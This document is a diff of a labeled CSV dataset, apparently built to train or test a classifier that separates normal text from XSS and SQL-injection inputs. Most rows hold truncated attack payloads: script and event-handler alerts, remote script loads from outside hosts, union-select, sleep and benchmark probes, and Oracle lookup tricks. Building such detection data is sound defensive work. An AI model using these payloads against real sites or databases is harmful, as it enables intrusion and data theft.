char ( 109 ) ||char ( 79 ) ||char ( 70",2,SQLi,16867 +"<STYLE type=""text/css"">BODY{background:url(""javasc",1,XSS,7129 +Merge the two lists.,0,normal,22552 +1 ) as cejp where 4736 = 4736 or 5286 = ( select c,2,SQLi,13768 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,8264 +"<output onmouseenter=""alert(1)"">test</output>",1,XSS,4358 +Select boost.,0,normal,24620 +&lt;!--#exec cmd=&quot;/bin/echo &apos;&lt;SCRIPT ,1,XSS,1422 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,5208 +"<IMG SRC=x onsuspend=""alert(String.fromCharCode(88",1,XSS,1236 +"select benchmark ( 5000000,md5 ( 0x4c4d6142 ) ) an",2,SQLi,19249 +<script src=//3334957647/1>,1,XSS,9258 +1 ) ) ) or 5356 = ( select count ( * ) from sysuse,2,SQLi,16817 +1'+ ( select 'wsjk' where 3291 = 3291,2,SQLi,19200 +<colgroup onpointerup=alert(1)>XSS</colgroup>,1,XSS,2330 +-8745' ) as xpwv where 8855 = 8855 or 4493 = utl_i,2,SQLi,16614 +"{""id"":null,""name"":""American Bulldog""}",0,normal,27060 +Please select an option.,0,normal,24310 +1%' ) ) and 7989 = 3457,2,SQLi,16964 +<td id=x tabindex=1 onbeforedeactivate=alert(1)></,1,XSS,4236 "<img src=""x` `<script>javascript:alert(1)</script>",1,XSS,685 -"1' ) ) and 4241 = convert ( int, ( select char ( 1",2,SQLi,19866 -"1 and 2388 = benchmark ( 5000000,md5 ( 0x6d457153 ",2,SQLi,17395 -<listing onpointerup=alert(1)>XSS</listing>,1,XSS,5795 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,8954 -`'><script>\xE2\x8523\x9Fjavascript:alert(523)</sc,1,XSS,8989 -"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8",2,SQLi,10781 +select dbms_pipe.receive_message ( chr ( 66 ) ||ch,2,SQLi,19864 +"-3349' or elt ( 6610 = 4379,4379 ) and 'poqm' like",2,SQLi,17393 +<footer onpointerout=alert(1)>XSS</footer>,1,XSS,5797 +";1lblah""<iframe/onload=confirm(document.domain);><",1,XSS,8956 +`'><script>\xE534\xA0\x8Ejavascript:alert(534)</sc,1,XSS,8991 +"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8",2,SQLi,10783 "<a href=""javas\x05cript:javascript:alert(1)"" id=""f",1,XSS,438 -"{""id"":null,""name"":""pass several""}",0,normal,27066 -1%' ) ) and 4386 = utl_inaddr.get_host_address ( c,2,SQLi,15927 -<style>:target {transform: rotate(180deg);}</style,1,XSS,6432 -<dialog onpointerout=alert(1)>XSS</dialog>,1,XSS,8626 -"1%' ) ) and make_set ( 6527 = 9529,9529 ) and ( ( ",2,SQLi,16572 -"<IMG DYNSRC=\""javascript:alert('XSS')\"">",1,XSS,1293 -Find data where necessary.,0,normal,23278 -"<article draggable=""true"" ondragenter=""alert(1)"">t",1,XSS,7856 -Select the recording option in your toolbar or by ,0,normal,25585 +Select the right angle for the shot.,0,normal,24185 +"1"" ) ) as gvpm where 5170 = 5170 or 5356 = ( selec",2,SQLi,15929 +<fieldset onblur=alert(1) tabindex=1 id=x></fields,1,XSS,6434 +<html id=x tabindex=1 onbeforedeactivate=alert(1)>,1,XSS,8628 +"1%' ) or elt ( 6272 = 6272,sleep ( 5 ) ) and ( '%'",2,SQLi,16574 +<font style='color:expression(alert(document.cooki,1,XSS,1294 +Search records where necessary.,0,normal,23275 +<image src/onerror=alert(1)>,1,XSS,7858 +Select the right pieces and your character will fe,0,normal,25582 `'><script>\xC2\xA0javascript:alert(1)</script>,1,XSS,592 -<img onpointerup=alert(1)>XSS</img>,1,XSS,5138 -"1' ) or updatexml ( 1808,concat ( 0x2e,0x7171706a7",2,SQLi,14781 -"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,",2,SQLi,10585 -1' or 6793 = ( select 6793 from pg_sleep ( 5 ) ) a,2,SQLi,14806 -"src=http://www.site.com/XSS.js""></script>",1,XSS,1341 -Select a card.,0,normal,24796 -"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHA",2,SQLi,10716 -Where's the observatory?,0,normal,23576 -1'|| ( select 'gopc' where 7386 = 7386 and make_se,2,SQLi,21498 -"1' ) or elt ( 6272 = 6272,sleep ( 5 ) ) and ( 'yzn",2,SQLi,15609 -Select your consequence.,0,normal,24879 -select case when 3076 = 1605 then 1 else null end-,2,SQLi,13249 -<script>window.onload=function(){document.forms[0],1,XSS,9002 -"1"" ) ) and 7656 = 5604 and ( ( ""zuhv"" = ""zuhv",2,SQLi,20409 -"<tr oncopy=""alert(1)"" contenteditable>test</tr>",1,XSS,4980 -<input2 onpointerdown=alert(1)>XSS</input2>,1,XSS,4889 -<script>document.vulnerable=true;</script>,1,XSS,1474 -1 ) order by 1#,2,SQLi,17392 -"-4473' ) union all select 7656,7656#",2,SQLi,21123 -"1%"" and row ( 6237,7469 ) > ( select count ( * ) ,",2,SQLi,14124 -1' or 4411 = ( select count ( * ) from sysusers as,2,SQLi,18023 -"<output onmouseover=""alert(1)"">test</output>",1,XSS,8216 -1'|| ( select 'tzxr' from dual where 2934 = 2934 a,2,SQLi,17471 -"&lt;IMG SRC=\""jav&#x0A;ascript&#058;alert('XSS');\",1,XSS,1096 -"1"" ) or 1022 = ( select count ( * ) from all_users",2,SQLi,14739 -"-7485"" ) ) as caob where 4100 = 4100 union all sel",2,SQLi,13883 -Select site.,0,normal,24547 -"<blockquote onclick=""alert(1)"">test</blockquote>",1,XSS,5877 -Select make.,0,normal,24565 -A common practice is to switch to palette color mo,0,normal,26441 -element[attribute='<img src=x onerror=alert('XSS'),1,XSS,1161 -"1%' ) union all select null,null,null,null,null,nu",2,SQLi,15816 -select ( case when ( 2593 = 3592 ) then 2593 else ,2,SQLi,15446 -In 1549 he was placed on a commission to examine A,0,normal,26029 -Unfortunately she came select group of played vip ,0,normal,25226 -"<img onkeydown=""alert(1)"" contenteditable>test</im",1,XSS,5303 -<dialog onpointerleave=alert(1)>XSS</dialog>,1,XSS,2769 -1' ) ) as fwhv where 3921 = 3921 union all select ,2,SQLi,13360 -</XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>,1,XSS,1574 -1 ) ) as debc where 7428 = 7428 union all select n,2,SQLi,14888 -"<area onkeyup=""alert(1)"" contenteditable>test</are",1,XSS,3952 -"1"" ) ) as dooi where 1806 = 1806 and 6414 = ( sele",2,SQLi,18402 -"1"" ) and 6240 = ( 'qqpjq'|| ( select case 6240 whe",2,SQLi,21865 -"<thead oncopy=""alert(1)"" contenteditable>test</the",1,XSS,3368 -select,0,normal,26586 -"To view the video clips, the site requires the use",0,normal,25247 -1'|| ( select 'rask' from dual where 9411 = 9411 a,2,SQLi,13436 -"select * from users where id = 1 or ""{;"" or 1 = 1 ",2,SQLi,11543 -"1 ) where 2473 = 2473 and updatexml ( 3393,concat ",2,SQLi,17008 -"<small draggable=""true"" ondragstart=""alert(1)"">tes",1,XSS,8010 -javascript:alert();//</title></noscript></noembed>,1,XSS,9532 +"<embed onkeypress=""alert(1)"" contenteditable>test<",1,XSS,5140 +-9555' ) ) ) or ( 8459 = 8459 ) *4906 and ( ( ( 'r,2,SQLi,14783 +"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,",2,SQLi,10587 +1' ) where 3861 = 3861,2,SQLi,14808 +"data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPj",1,XSS,1342 +Where did you find that stylish boutique?,0,normal,23722 +"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHA",2,SQLi,10718 +Create a map.,0,normal,22850 +"1"" ) or elt ( 6272 = 6272,sleep ( 5 ) ) and ( ""fvr",2,SQLi,20172 +"select count ( * ) from rdb$fields as t1,rdb$types",2,SQLi,15611 +Select your effect.,0,normal,24876 +1' where 6116 = 6116,2,SQLi,13251 +onload=alert(1)><svg/1=',1,XSS,9004 +"1"" ) and 3732 = 3850 and ( ""edjv"" = ""edjv",2,SQLi,20407 +<frame onpointerenter=alert(1)>XSS</frame>,1,XSS,4982 +<section onpointerup=alert(1)>XSS</section>,1,XSS,4891 +"<img SRC=""jav ascript:document.vulnerable=true;"">",1,XSS,1475 +"-5924' where 5415 = 5415 union all select 5415,541",2,SQLi,17181 +1' or 8156 = ( select count ( * ) from generate_se,2,SQLi,21121 +1 where 8393 = 8393,2,SQLi,14126 +"1"" and make_set ( 4214 = 9503,9503 ) and ""phjg"" li",2,SQLi,18021 +<style>:target {color:red;}</style><colgroup id=x ,1,XSS,8218 +"1 ) ) or elt ( 6272 = 6272,sleep ( 5 ) ) and ( ( 8",2,SQLi,17469 +"&lt;IMG SRC=\""jav&#x09;ascript&#058;alert('XSS');\",1,XSS,1097 +"1"" ) and 2388 = benchmark ( 5000000,md5 ( 0x6d4571",2,SQLi,14741 +-9644 ) ) or 4144 = ( select upper ( xmltype ( chr,2,SQLi,13885 +Select place.,0,normal,24544 +"<dir onmousedown=""alert(1)"">test</dir>",1,XSS,5879 +1 where 1636 = 1636 and 6240 = ( 'qqpjq'|| ( selec,2,SQLi,17519 +"A gold version will also follow in ""select countri",0,normal,26438 +"[<blockquote cite=""]"">["" onmouseover=""alert('RVRSH",1,XSS,1162 +"waitfor delay '0:0:5' and ( ""%"" = """,2,SQLi,15818 +"1%' and make_set ( 8403 = 8403,8899 ) and '%' = '",2,SQLi,15448 +( 8266 = 8266 ) *9900,2,SQLi,19623 +"1%"" or ( select * from ( select ( sleep ( 5 ) ) ) ",2,SQLi,17823 +<br id=x tabindex=1 onfocus=alert(1)></br>,1,XSS,5305 +"<ruby onmouseup=""alert(1)"">test</ruby>",1,XSS,2770 +"-3215"" ) union all select 4457,4457,4457,4457,4457",2,SQLi,13362 +XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>,1,XSS,1575 +"1' in boolean mode ) and elt ( 1210 = 1210,sleep (",2,SQLi,14890 +<colgroup onfocusout=alert(1) tabindex=1 id=x></co,1,XSS,3954 +"1%' ) ) union all select null,null,null,null,null,",2,SQLi,18400 +-6661' ) ) or 2724 in ( ( char ( 113 ) +char ( 113,2,SQLi,21863 +<link id=x tabindex=1 onbeforedeactivate=alert(1)>,1,XSS,3370 +select,0,normal,26583 +To select multiple files on Windows 10 from a fold,0,normal,25244 +"select count ( * ) from domain.domains as t1,domai",2,SQLi,13438 +"select * from users where id = '1' or """"<@ union s",2,SQLi,11545 +1' ) where 5307 = 5307,2,SQLi,17010 +<main id=x tabindex=1 onfocus=alert(1)></main>,1,XSS,8012 +"javascript:alert()//\"";alert();/*-/*`/*\`/*'/*""/**",1,XSS,9534 "{""id"":null,""firstName"":""Daryl"",""lastName"":""Yeo"",""s",0,normal,27462 -1' in boolean mode ) rlike ( select ( case when ( ,2,SQLi,18704 -1'|| ( select 'jmao' where 3009 = 3009,2,SQLi,12511 -select * from users where id = 1 + ( \ ) or 1 = 1 ,2,SQLi,11987 -"<track onmouseout=""alert(1)"">test</track>",1,XSS,4996 -><script+src=https://api-metrika.yandex.ru/managem,1,XSS,9782 -or 'whatever' in ( 'whatever' ),2,SQLi,11751 -"1%' ) ) union all select null,null,null,null,null,",2,SQLi,18327 -"1"" ) ) ) and 9198 = 9198--",2,SQLi,17166 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,8709 -"1' ) where 9091 = 9091 union all select null,null,",2,SQLi,19156 -&lt;IMG SRC=javascript&#058;alert(String&#46;fromC,1,XSS,1101 -1 ) where 6150 = 6150,2,SQLi,20968 -"<rt onbeforecut=""alert(1)"" contenteditable>test</r",1,XSS,3236 -"1%"" ) ) or 8384 = like ( 'abcdefg',upper ( hex ( r",2,SQLi,20504 -<object onblur=alert(1) tabindex=1 id=x></object><,1,XSS,4723 -1 ) as wokl where 1368 = 1368 union all select nul,2,SQLi,17683 -select ( case when ( 2968 = 2021 ) then 1 else 296,2,SQLi,19734 -"<bgsound oncontextmenu=""alert(1)"">test</bgsound>",1,XSS,5267 -1%' ) ) ) and 7533 = 7533 and ( ( ( '%' = ',2,SQLi,15327 -"<applet oncopy=""alert(1)"" contenteditable>test</ap",1,XSS,7033 -select dbms_pipe.receive_message ( chr ( 66 ) ||ch,2,SQLi,19864 +Select the perfect gift for the occasion.,0,normal,24251 +1'|| ( select 'rfjl' where 2476 = 2476 or 7552 = (,2,SQLi,12513 +AND 1 = utl_inaddr.get_host_address ( ( SELECT DIS,2,SQLi,11989 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,4998 +><script+src=http://app-sjint.marketo.com/index.ph,1,XSS,9784 +select * from users where id = '1' or 1 = 1 -- 1',2,SQLi,11753 +1' ) and 7533 = 7533 and ( 'cryr' = 'cryr,2,SQLi,18217 +1'+ ( select 'iyyv' where 9500 = 9500 or ( select ,2,SQLi,17168 +<style>:target {color:red;}</style><datalist id=x ,1,XSS,8711 +She'll select the winner.,0,normal,24306 +"&lt;IMG \""\""\""&gt;&lt;SCRIPT&gt;alert(\""XSS\"")&lt;",1,XSS,1102 +Where's your SQL task?,0,normal,23424 +<wbr id=x tabindex=1 onbeforeactivate=alert(1)></w,1,XSS,3238 +"-4692%"" ) ) union all select 1781,1781#",2,SQLi,20502 +<svg><optgroup onload=alert(1)></optgroup>,1,XSS,4725 +"1"" ) ) as hfma where 2654 = 2654 and make_set ( 84",2,SQLi,17681 +select,0,normal,26556 +"<meta onkeydown=""alert(1)"" contenteditable>test</m",1,XSS,5269 +"-9050 union all select 9346,9346,9346,9346,9346,93",2,SQLi,15329 +"<a onmouseout=""alert(1)"">test</a>",1,XSS,7035 +1 ) where 4780 = 4780,2,SQLi,19862 "<meta http-equiv=""refresh"" content=""0;url=javascri",1,XSS,330 -"select like ( 'abcdefg',upper ( hex ( randomblob (",2,SQLi,18963 -"select * from generate_series ( 7724,7724,case whe",2,SQLi,22276 -"<style>@keyframes slidein {}</style><hr style=""ani",1,XSS,4523 -1' ) ) or ( select 2* ( if ( ( select * from ( sel,2,SQLi,21589 +1'|| ( select 'fzcu' where 9252 = 9252 procedure a,2,SQLi,18961 +Tavistock was governed from before the Conquest by,0,normal,25499 +"<datalist ondblclick=""alert(1)"">test</datalist>",1,XSS,4525 +select ( case when ( 3168 = 5577 ) then 3168 else ,2,SQLi,21587 "<a href=""data:application/x-x509-user-cert;&NewLin",1,XSS,850 -I need to decide where to go for a hike.,0,normal,23812 -"1%"" or 4240 = ( select 4240 from pg_sleep ( 5 ) ) ",2,SQLi,19192 -<noembed onblur=alert(1) tabindex=1 id=x></noembed,1,XSS,5608 -Females can’t use them to select mates.,0,normal,26197 -"<li onmouseout=""alert(1)"">test</li>",1,XSS,3149 -"<IMG SRC=\""jav&#x09;ascript:alert('XSS');\"">",1,XSS,1285 -ý or 1 = 1 --,2,SQLi,11617 -<style>:target {transform: rotate(180deg);}</style,1,XSS,8607 -"1"" ) ) union all select null,null--",2,SQLi,16538 -"{""id"":null,""name"":""Lionfish""}",0,normal,27279 +Let's decide where to go for a weekend getaway.,0,normal,23809 +1'+ ( select hrgu where 9587 = 9587,2,SQLi,20265 +<style>:target {color: red;}</style><br id=x style,1,XSS,5610 +Find and select Users & Groups from the System Pre,0,normal,26194 +<img id=x tabindex=1 onbeforedeactivate=alert(1)><,1,XSS,3151 +"<IMG SRC=\""jav&#x0A;ascript:alert('XSS');\"">",1,XSS,1286 +"select * from users where id = 1 or 1#"", union sel",2,SQLi,11619 +"<object onkeyup=""alert(1)"" contenteditable>test</o",1,XSS,8609 +1' ) and 6414 = ( select count ( * ) from rdb$fiel,2,SQLi,16540 +"{""id"":null,""name"":""highway go""}",0,normal,27277 <iframe srcdoc=&lt;script&gt;alert&lpar;1&rpar;&lt,1,XSS,210 -"-5575"" union all select 8665,8665,8665,8665,8665,8",2,SQLi,12715 -<head onpointerup=alert(1)>XSS</head>,1,XSS,3272 -"<strike onmousemove=""alert(1)"">test</strike>",1,XSS,4718 -ORDER BY 14#,2,SQLi,10287 +1'+ ( select 'idmr' where 5029 = 5029 union all se,2,SQLi,12717 +<picture onblur=alert(1) tabindex=1 id=x></picture,1,XSS,3274 +<svg><article onload=alert(1)></article>,1,XSS,4720 +ORDER BY 16#,2,SQLi,10289 "&lt;IMG STYLE=\""xss&#58;expr/*XSS*/ession(alert('X",1,XSS,1005 -Plant some colorful flowers.,0,normal,22625 -The extraordinary patience requisite to a successf,0,normal,25452 -UNION ALL SELECT 1#,2,SQLi,10533 -"1"" where 8089 = 8089",2,SQLi,15248 -select sleep ( 5 ) and ( ( ( 8354 = 8354,2,SQLi,18480 -select * from users where id = '1' union select !<,2,SQLi,11472 -"select * from users where id = 1 or "" ( {"" or 1 = ",2,SQLi,11526 -Sort the puzzle pieces.,0,normal,22644 -"<font onkeyup=""alert(1)"" contenteditable>test</fon",1,XSS,6213 -"<small onmouseout=""alert(1)"">test</small>",1,XSS,3543 -1' and 9660 = ( select count ( * ) from all_users ,2,SQLi,17550 +"{""id"":null,""name"":""Cloyster""}",0,normal,27555 +"{""id"":null,""firstName"":""Jayden"",""lastName"":""Goh"",""",0,normal,27459 +"UNION ALL SELECT 1,2,3#",2,SQLi,10535 +1'|| ( select 'ryom' where 1134 = 1134 or char ( 1,2,SQLi,15250 +select ( case when ( 2768 = 8868 ) then 2768 else ,2,SQLi,17458 +select * from users where id = 1 %!<1 or 1 = 1 -- ,2,SQLi,11474 +"select * from users where id = 1 or ""{."" or 1 = 1 ",2,SQLi,11528 +Modify the privacy settings.,0,normal,22641 +"<style>@keyframes slidein {}</style><del style=""an",1,XSS,6215 +"<thead onbeforecopy=""alert(1)"" contenteditable>tes",1,XSS,3545 +1' ) or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||,2,SQLi,17548 "<IMG SRC=""jav ascript:alert('XSS');"">",1,XSS,254 -"{""id"":null,""firstName"":""Jia"",""lastName"":""Huiz"",""ad",0,normal,27486 -<x contenteditable onkeyup=alert(1)>press any key!,1,XSS,9341 -1' where 7417 = 7417 and 8407 = ( select count ( *,2,SQLi,21369 -"<time ondblclick=""alert(1)"">test</time>",1,XSS,6404 -"{""id"":null,""firstName"":""Chang"",""lastName"":""Yu"",""sp",0,normal,26957 -"<slot onbeforecut=""alert(1)"" contenteditable>test<",1,XSS,7633 -<IMG SRC=�javascript:alert(�XSS�)�,1,XSS,1729 -"On the top right, select the cog wheel (""Settings""",0,normal,25837 -"-5776%' union all select 3075,3075,3075,3075,3075-",2,SQLi,14678 -"select * from users where id = 1 or "".]"" or 1 = 1 ",2,SQLi,11442 --7565%' ) or 2724 in ( ( char ( 113 ) +char ( 113 ,2,SQLi,21975 -1 or 6793 = ( select 6793 from pg_sleep ( 5 ) ) --,2,SQLi,14594 -"<param onmousemove=""alert(1)"">test</param>",1,XSS,1972 -Select a recipe to try cooking.,0,normal,24121 -Consumers in rural areas should either select a 2.,0,normal,26270 -"-6534%' ) ) or make_set ( 4107 = 9457,9457 ) and (",2,SQLi,16081 --6144' ) or 9385 = 2474--,2,SQLi,13056 -"1' where 4245 = 4245 union all select null,null--",2,SQLi,21208 +"{""id"":null,""firstName"":""Wufu"",""lastName"":""Shi"",""sp",0,normal,27590 +<x o%6Exxx=1,1,XSS,9343 +"Then select write, and the word "" write "" will be ",0,normal,25340 +"<img onbeforepaste=""alert(1)"" contenteditable>test",1,XSS,6406 +"{""id"":null,""firstName"":""Helen"",""lastName"":""Luo"",""s",0,normal,26954 +<tbody onpointerup=alert(1)>XSS</tbody>,1,XSS,7635 +�scriptualert(EXSSE)�/scriptu,1,XSS,1730 +"On Tuesday, Democrats will select their nominees i",0,normal,25834 +1 rlike sleep ( 5 ) #,2,SQLi,14680 +select * from users where id = 1.<@$ union select ,2,SQLi,11444 +"1"" ) ) and elt ( 1210 = 1210,sleep ( 5 ) ) and ( (",2,SQLi,20442 +"1"" ) where 5298 = 5298 and 4386 = utl_inaddr.get_h",2,SQLi,14596 +<var onpointerup=alert(1)>XSS</var>,1,XSS,1973 +Select the best ingredients for the recipe.,0,normal,24118 +-6014' ) ) or ( 9860 = 4848 ) *4848 and ( ( 'qtge',2,SQLi,20404 +1'|| ( select 'uyfo' where 1236 = 1236 or 5286 = (,2,SQLi,16083 +1 ) ) or 2367 = ( select count ( * ) from rdb$fiel,2,SQLi,13058 +In the general consular service appointments are s,0,normal,25996 <style>p[foo=bar{}*{-o-link:'javascript:javascript,1,XSS,695 -select * from users where id = 1 union select 1 $$,2,SQLi,12048 -"{""id"":null,""name"":""born""}",0,normal,27013 -<nobr id=x tabindex=1 onactivate=alert(1)></nobr>,1,XSS,2285 -"<strong onmouseup=""alert(1)"">test</strong>",1,XSS,3095 -"<;A HREF="";http://www.google.com./"";>;XSS<;/A>;",1,XSS,1678 -<big onpointerleave=alert(1)>XSS</big>,1,XSS,2115 -"If you are attending a baby shower, it is common t",0,normal,26051 -"1"" ) rlike sleep ( 5 ) #",2,SQLi,19450 -Order a pepperoni pizza.,0,normal,22606 -"))) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AN",2,SQLi,11293 -"<u onbeforecut=""alert(1)"" contenteditable>test</u>",1,XSS,5042 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,3564 -"-9062"" or 6872 = 6872 and ""aumq"" like ""aumq",2,SQLi,18363 -group by username having 1=1--,2,SQLi,9955 -1' ) ) as pdrg where 5960 = 5960 and 9198 = 9198--,2,SQLi,19520 -"<ol onmouseleave=""alert(1)"">test</ol>",1,XSS,6313 -1 where 5466 = 5466 and 2388 = benchmark ( 5000000,2,SQLi,12104 -"admin"" ) or ( ""1"" = ""1""/*",2,SQLi,12005 --2316' ) ) ) or 8519 = 6010,2,SQLi,17041 -waitfor delay '00:00:05'#,2,SQLi,10384 -"<ol onbeforecopy=""alert(1)"" contenteditable>test</",1,XSS,6685 -Select register.,0,normal,24633 -"<audio onpaste=""alert(1)"" contenteditable>test</au",1,XSS,8187 -Update the look.,0,normal,22814 -1' rlike ( select ( case when ( 6855 = 1056 ) then,2,SQLi,17730 -or 'a' = 'a,2,SQLi,11632 -Select the perfect wedding venue.,0,normal,24402 -"<rb onmousemove=""alert(1)"">test</rb>",1,XSS,2485 -"1"" where 1051 = 1051 union all select null--",2,SQLi,13035 -Select a dance move to perform.,0,normal,24194 -"-1510' ) ) ) union all select 8755,8755,8755,8755,",2,SQLi,18598 -"<tfoot oncontextmenu=""alert(1)"">test</tfoot>",1,XSS,7206 -"<style>@keyframes x{}</style><center style=""animat",1,XSS,5968 -I need to decide where to go for a day trip.,0,normal,23742 -"-1483' or make_set ( 9354 = 9354,7185 ) and 'qfil'",2,SQLi,19835 -Select a random number.,0,normal,24472 -"<param onmouseup=""alert(1)"">test</param>",1,XSS,3410 -admin' or 1=1--,2,SQLi,9911 -Only a select handful will have the opportunity to,0,normal,25819 -<noframes id=x tabindex=1 onactivate=alert(1)></no,1,XSS,7193 -"{""id"":16436,""name"":""jmeter test <DO NOT DELETE""}",0,normal,26797 -"#""><img src=M onerror=alert('XSS');>",1,XSS,1160 -"-8790' ) or 1570 = convert ( int, ( select char ( ",2,SQLi,21898 -"1"" ) ) and make_set ( 8266 = 9226,9226 ) and ( ( """,2,SQLi,14675 -<%73%63%72%69%70%74> %64 = %64%6f%63%75%6d%65%6e%7,1,XSS,9025 -"1%"" ) procedure analyse ( extractvalue ( 5840,conc",2,SQLi,15186 -"{""id"":null,""name"":""tool""}",0,normal,27574 -"<style>@keyframes x{}</style><tr style=""animation-",1,XSS,7954 -"You select your ISO, select your USB drive, and cl",0,normal,25057 -"<span onmouseenter=""alert(1)"">test</span>",1,XSS,8119 -1' ) as wnyl where 8978 = 8978 or 5286 = ( select ,2,SQLi,14121 -1' ) where 5286 = 5286,2,SQLi,17852 -"1' ) or extractvalue ( 1297,concat ( 0x5c,0x717170",2,SQLi,18202 -1' ) where 6305 = 6305 rlike ( select ( case when ,2,SQLi,13949 -"select * from users where id = 1 or "" ( ,"" = 1 or ",2,SQLi,12077 -1 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)# 1,2,SQLi,11180 -Select your accomplish.,0,normal,25006 -"<table oncontextmenu=""alert(1)"">test</table>",1,XSS,5915 -"1 ) ) union all select null,null#",2,SQLi,16841 -I'm thinking of where to spend my day off.,0,normal,23673 -"<slot draggable=""true"" ondragenter=""alert(1)"">test",1,XSS,5398 -"1"" ) as vdim where 1296 = 1296",2,SQLi,20510 -1'+ ( select 'wkcq' where 1020 = 1020 and 2388 = b,2,SQLi,19205 -1'+ ( select iowv where 6105 = 6105 and sleep ( 5 ,2,SQLi,16481 -eval(a+b+c+d),1,XSS,3131 -<title id=x tabindex=1 ondeactivate=alert(1)></tit,1,XSS,8016 -"<aside onclick=""alert(1)"">test</aside>",1,XSS,6781 -"1"" ) or 6793 = ( select 6793 from pg_sleep ( 5 ) )",2,SQLi,12124 -<html onpointerup=alert(1)>XSS</html>,1,XSS,6619 -"<SCRIPT a="">'>"" SRC=""httx://.rocks/.js""></SCRIPT>",1,XSS,2628 -"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,",2,SQLi,10560 -"<col onmousedown=""alert(1)"">test</col>",1,XSS,2240 +0x730065006c00650063007400200040004000760065007200,2,SQLi,12050 +"{""id"":null,""name"":""amount""}",0,normal,27010 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,2286 +<style>:target {transform: rotate(180deg);}</style,1,XSS,3096 +"<;A HREF="";javascript:document.location=';http://w",1,XSS,1679 +<details onpointerdown=alert(1)>XSS</details>,1,XSS,2116 +If you have a voltmeter or DVM select the 200 volt,0,normal,26048 +"iif ( 1746 = 1730,1,1/0 )",2,SQLi,19448 +Join the book club.,0,normal,22603 +") AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ",2,SQLi,11295 +"<param draggable=""true"" ondrag=""alert(1)"">test</pa",1,XSS,5044 +"<tt onmouseout=""alert(1)"">test</tt>",1,XSS,3566 +1'|| ( select 'mwpd' where 2887 = 2887,2,SQLi,18361 +or 0=0 --,2,SQLi,9957 +"-4319"" ) where 7534 = 7534 or 8246 = 3217",2,SQLi,19518 +<applet id=x tabindex=1 onbeforedeactivate=alert(1,1,XSS,6315 +1' ) or 5286 = ( select count ( * ) from all_users,2,SQLi,12106 +select * from users where id = '1' union select ( ,2,SQLi,12007 +1 ) and sleep ( 5 ) #,2,SQLi,17043 +"benchmark(50000000,MD5(1))--",2,SQLi,10386 +"<plaintext onkeypress=""alert(1)"" contenteditable>t",1,XSS,6687 +Select power.,0,normal,24630 +"<header onmouseup=""alert(1)"">test</header>",1,XSS,8189 +Modify privacy.,0,normal,22811 +"1%' or updatexml ( 1808,concat ( 0x2e,0x7171706a71",2,SQLi,18636 +"select * from users where id = 1 union select 1<@,",2,SQLi,11634 +She'll select her engagement ring.,0,normal,24399 +<meter onpointermove=alert(1)>XSS</meter>,1,XSS,2486 +"1', ( case when 5204 = 2136 then 1 else null end )",2,SQLi,13037 +Select a font style for the project.,0,normal,24191 +1' ) ) and 7756 = dbms_utility.sqlid_to_sqlhash ( ,2,SQLi,18596 +"<SCRIPT/SRC=""http://.rocks/.js""></SCRIPT>",1,XSS,7208 +"<u draggable=""true"" ondragleave=""alert(1)"">test</u",1,XSS,5970 +Where's the perfect spot for a scenic drive?,0,normal,23739 +"{""id"":null,""firstName"":""Ng"",""lastName"":""Hui"",""addr",0,normal,27241 +"{""id"":null,""firstName"":""Muhd"",""lastName"":""Azirruan",0,normal,26931 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,3412 +admin' or 1=1/*,2,SQLi,9913 +"Open Photoshop CC 2020 and select ""Open"" and then ",0,normal,25816 +"<abbr oncopy=""alert(1)"" contenteditable>test</abbr",1,XSS,7195 +select,0,normal,26614 +element[attribute='<img src=x onerror=alert('XSS'),1,XSS,1161 +1' ) ) and 8407 = ( select count ( * ) from genera,2,SQLi,21896 +select ( case when ( 5698 = 3453 ) then 5698 else ,2,SQLi,14677 +<--`<iMG/srC=` onerror=confirm``> --!>,1,XSS,9027 +"1"" ) ) ) and 2853 = cast ( ( chr ( 113 ) ||chr ( 1",2,SQLi,15188 +Where's the SQL query?,0,normal,23436 +"<strong onbeforepaste=""alert(1)"" contenteditable>t",1,XSS,7956 +You'll then see a dialog box that allows you to se,0,normal,25054 +<plaintext id=x tabindex=1 onbeforeactivate=alert(,1,XSS,8121 +1'|| ( select 'jnsd' from dual where 2316 = 2316 u,2,SQLi,14123 +1' ) ) ) and 7756 = dbms_utility.sqlid_to_sqlhash ,2,SQLi,17850 +1'+ ( select ksoh where 6339 = 6339,2,SQLi,18200 +"1%"" ( select ( case when ( 5451 = 5451 ) then rege",2,SQLi,13951 +select * from users where id = 1 union select @&&@,2,SQLi,12079 +1 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SL,2,SQLi,11182 +An act of 1887 had amended the provisions of the W,0,normal,26374 +"<p onmouseover=""alert(1)"">test</p>",1,XSS,5917 +1 ) where 8041 = 8041,2,SQLi,16843 +I need to select a movie for family night.,0,normal,23670 +<blockquote onpointerout=alert(1)>XSS</blockquote>,1,XSS,5400 +"1"" ) ) union all select null,null,null,null,null,n",2,SQLi,20461 +"-8580' ) union all select 3428,3428,3428,3428,3428",2,SQLi,19203 +1 ) rlike ( select * from ( select ( sleep ( 5 ) ),2,SQLi,16483 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,3133 +<set onpointerout=alert(1)>XSS</set>,1,XSS,8018 +<template onpointerleave=alert(1)>XSS</template>,1,XSS,6783 +"-9508 ) union all select 9950,9950,9950,9950,9950,",2,SQLi,12126 +<thead 